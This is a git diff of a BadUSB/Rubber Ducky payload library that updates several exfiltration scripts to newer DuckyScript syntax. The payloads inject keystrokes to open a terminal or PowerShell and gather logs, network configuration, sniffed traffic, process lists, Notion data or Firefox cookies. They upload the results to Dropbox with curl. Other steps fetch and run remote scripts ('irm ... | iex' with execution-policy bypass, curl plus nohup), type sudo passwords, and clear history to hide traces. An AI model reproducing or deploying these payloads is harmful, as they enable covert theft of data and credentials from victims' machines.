+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
STRING powershell
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
index 8f44f1c..19cec2e 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
+++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
@@ -1,11 +1,9 @@
-# Exfiltrate Linux Content With Dropbox - BADUSB ✅
+# Exfiltrate Linux Content With Dropbox
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
-[](https://github.com/aleff-github/my-flipper-shits)
-
## Description
A script used to take folder content on Linux Systems.
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
index 346d51d..77df483 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
@@ -1,12 +1,10 @@
-# Exfiltrate Linux Log Files - BADUSB ✅
+# Exfiltrate Linux Log Files
A script used to take linux logs.
**Category**: Exfiltration, Execution
-[](https://github.com/aleff-github/my-flipper-shits)
-
## Description
A script used to take linux logs.
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
index dbd546f..721e08c 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -1,80 +1,93 @@
-REM ######################################################
-REM # |
-REM # Title : Exfiltrate Linux Logs With Dropbox |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Execution |
-REM # Target : Linux |
-REM # |
-REM ######################################################
+REM_BLOCK
+######################################################
+# #
+# Title : Exfiltrate Linux Logs With Dropbox #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Execution #
+# Target : Linux #
+# #
+######################################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
-
-DELAY 1000
-CTRL-ALT t
-
REM Required: Set here your Dropbox access TOKEN
-DELAY 2000
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+DEFINE #TOKEN example
+REM Send to Dropbox function
+DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+CTRL-ALT t
+DELAY 2000
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
REM Create random num
DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
REM Folder path
DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
REM Zip path
DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
-STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
REM Default log path
DELAY 500
-STRING LOG_PATH="/var/log/"
-ENTER
+STRINGLN LOG_PATH="/var/log/"
DELAY 500
-STRING zip -r "$ZIP_PATH" "$LOG_PATH"
-ENTER
+STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
-STRING DROPBOX_FOLDER="/$ZIP_NAME"
-ENTER
+STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
-REM Send to Dropbox function
-DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
-STRING curl -X POST
-STRING DROPBOX_API_LINK
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
+STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
REM Send timing - it depends
DELAY 5000
DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
index 56817ac..542ee44 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
@@ -1,5 +1,5 @@
-# Exfiltrate Network Configuration - Linux ✅
+# Exfiltrate Network Configuration - Linux
A script used to exfiltrate the network configuration on a Linux machine.
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
index 91230a9..932483b 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
@@ -1,96 +1,101 @@
-
-REM ##########################################################
-REM # |
-REM # Title : Exfiltrate Linux Network Configuration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Execution |
-REM # Target : Linux |
-REM # |
-REM ##########################################################
+REM_BLOCK
+##########################################################
+# #
+# Title : Exfiltrate Linux Network Configuration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Execution #
+# Target : Linux #
+# #
+##########################################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
-DELAY 1000
-CTRL-ALT t
-
-DELAY 2000
REM Required: Set here your Dropbox access TOKEN
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+DEFINE #TOKEN example
-REM DELAY 500
-REM STRING USER_NAME=$(whoami)
-REM ENTER
+REM Set yout Dropbox folder name
+DEFINE #DROPBOX_FOLDER_NAME example
+
+REM This is just a Dropbox const, don't edit
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+CTRL-ALT t
+DELAY 2000
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN USER_NAME=$(whoami)
DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
+
DELAY 500
-STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
+DELAY 500
+STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
REM Folder path
DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
DELAY 500
-STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
-ENTER
+STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
DELAY 1000
-STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
-ENTER
+STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
DELAY 1000
-STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
-ENTER
+STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
-
-REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-ENTER
-STRING DROPBOX_FOLDER_NAME
-ENTER
-STRING "
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
+
+STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
DELAY 2000
-STRING history -c
-ENTER
+STRINGLN history -c
DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
DELAY 500
-STRING rm -rf "$ZIP_PATH"
-ENTER
-
-DELAY 500
-STRING exit
-ENTER
\ No newline at end of file
+STRINGLN rm -rf "$ZIP_PATH"; exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
index 5104923..04209f1 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
@@ -1,57 +1,76 @@
-
-REM #############################################
-REM # |
-REM # Title : Exfiltrate Network Traffic |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM #############################################
+REM_BLOCK
+#############################################
+# #
+# Title : Exfiltrate Network Traffic #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+#############################################
+END_REM
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
-DEFINE SUDO_PASS example
+DEFINE #SUDO_PASS example
+
REM REQUIRED: Set what you want to sniff, for example tcp port 80
-DEFINE SNIFFING example
+DEFINE #SNIFFING example
+
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
-DEFINE TOKEN example
+DEFINE #TOKEN example
+
REM Just a Dropbox const
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
REM Output file path packets.pcap, remember to use pcap extension
-DEFINE FILE example.pcap
+DEFINE #FILE example.pcap
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
STRINGLN sudo su
DELAY 1000
-STRINGLN SUDO_PASS
+STRINGLN #SUDO_PASS
DELAY 1000
-
REM #### Network Traffic SECTION ####
-
-
-STRING FILE_PATH="
-STRING FILE
-STRING "
-ENTER
+STRINGLN FILE_PATH="#FILE"
DELAY 500
-STRING filter_expression="
-STRING SNIFFING
-STRING "
-ENTER
+STRINGLN filter_expression="#SNIFFING"
DELAY 500
REM Network card name
@@ -71,28 +90,18 @@ DELAY 60000
REM Kill the process by PID
STRINGLN kill $tcpdump_pid
-
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
-ENTER
-
+STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
REM #### REMOVE TRACES ####
-
-
STRINGLN rm "$FILE_PATH"
DELAY 500
diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
index 8a26d43..c0314df 100644
--- a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
+++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
@@ -1,13 +1,14 @@
-
-REM ##################################################
-REM # |
-REM # Title : Exfiltrate Photos Through Shell |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM ##################################################
+REM_BLOCK
+##################################################
+# #
+# Title : Exfiltrate Photos Through Shell #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+##################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
-DEFINE SCRIPT-SH-LINK example.com
+DEFINE #SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
-DEFINE SUDO-PSWD example
+DEFINE #SUDO-PSWD example
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### Permission ####
-
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
-STRING sudo su
-ENTER
+STRINGLN sudo su
DELAY 500
-STRING SUDO-PSWD
-ENTER
+STRINGLN #SUDO-PSWD
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
-REM STRING apt install fswebcam -y
-REM ENTER
+REM STRINGLN apt install fswebcam -y
REM DELAY Based On Internet Power
REM DELAY 5000
-
REM #### Script ####
-
-
-STRING curl
-STRING SCRIPT-SH-LINK
-STRING > script.sh
-ENTER
+STRINGLN curl #SCRIPT-SH-LINK > script.sh
REM DELAY Based On Internet Power
DELAY 4000
-STRING chmod +x script.sh
-ENTER
+STRINGLN chmod +x script.sh
DELAY 500
-STRING nohup ./script.sh > /dev/null 2>&1 & exit
-ENTER
+STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
index bdea251..3a3ccae 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
@@ -1,73 +1,79 @@
-
-REM ##########################################
-REM # |
-REM # Title : Exfiltrate Process Info |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM ##########################################
+REM_BLOCK
+##########################################
+# #
+# Title : Exfiltrate Process Info #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+##########################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
-DELAY 1000
+REM Set yout Dropbox folder name
+DEFINE #DROPBOX_FOLDER_NAME example
+
+REM This is just a Dropbox const, don't edit
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### GET PROCESS SECTION ####
-
-
-STRING ps aux > process.txt
-ENTER
+STRINGLN ps aux > process.txt
DELAY 500
-
REM #### EXFILTRATE SECTION ####
-
-
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
DELAY 500
-STRING TXT_PATH="/home/$USER_NAME/process.txt"
-ENTER
+STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
DELAY 500
-REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-STRING DROPBOX_FOLDER_NAME
-STRING "
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
-ENTER
+STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
-
REM #### REMOVE TRACES ####
-
-
-STRING history -c
-ENTER
-DELAY 500
-STRING exit
-ENTER
+STRINGLN history -c; exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
index 1b02c91..7716658 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
@@ -1,26 +1,66 @@
-REM ##########################################
-REM # |
-REM # Title : Exfiltrate Process Info |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ##########################################
+REM_BLOCK
+##########################################
+# #
+# Title : Exfiltrate Process Info #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+##########################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Webhook
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
-DEFINE PAYLOAD example.com
+DEFINE #PAYLOAD example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass irm
-STRING PAYLOAD
-STRING | iex
-ENTER
+STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
index faf0d9f..432a66a 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
@@ -33,18 +33,12 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
Github
-
-
-
-
-
Instagram
- |
-
Discord
+
Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
index 8610368..bc46354 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
@@ -1,26 +1,68 @@
-REM #########################################################################
-REM # |
-REM # Title : Exfiltrates the entire database of the Notion client |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM #########################################################################
-
+REM_BLOCK
+#########################################################################
+# #
+# Title : Exfiltrates the entire database of the Notion client #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+#########################################################################
+END_REM
REM Requirements:
REM - Notion must be installed
REM - Internet Connection
-
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
-STRING PowerShell
-ENTER
+STRINGLN PowerShell
DELAY 2000
REM Settings about Notion DB
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
index 3ef6e5c..88aa91e 100644
--- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
@@ -1,31 +1,69 @@
-REM ####################################################
-REM # |
-REM # Title : Export Firefox Cookies Database |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################
-
+REM_BLOCK
+####################################################
+# #
+# Title : Export Firefox Cookies Database #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+####################################################
+END_REM
REM Requirements:
REM - Firefox must be installed
-
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
-DEFINE DROPBOX_ACCESS_TOKEN "example"
+DEFINE #DROPBOX_ACCESS_TOKEN "example"
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
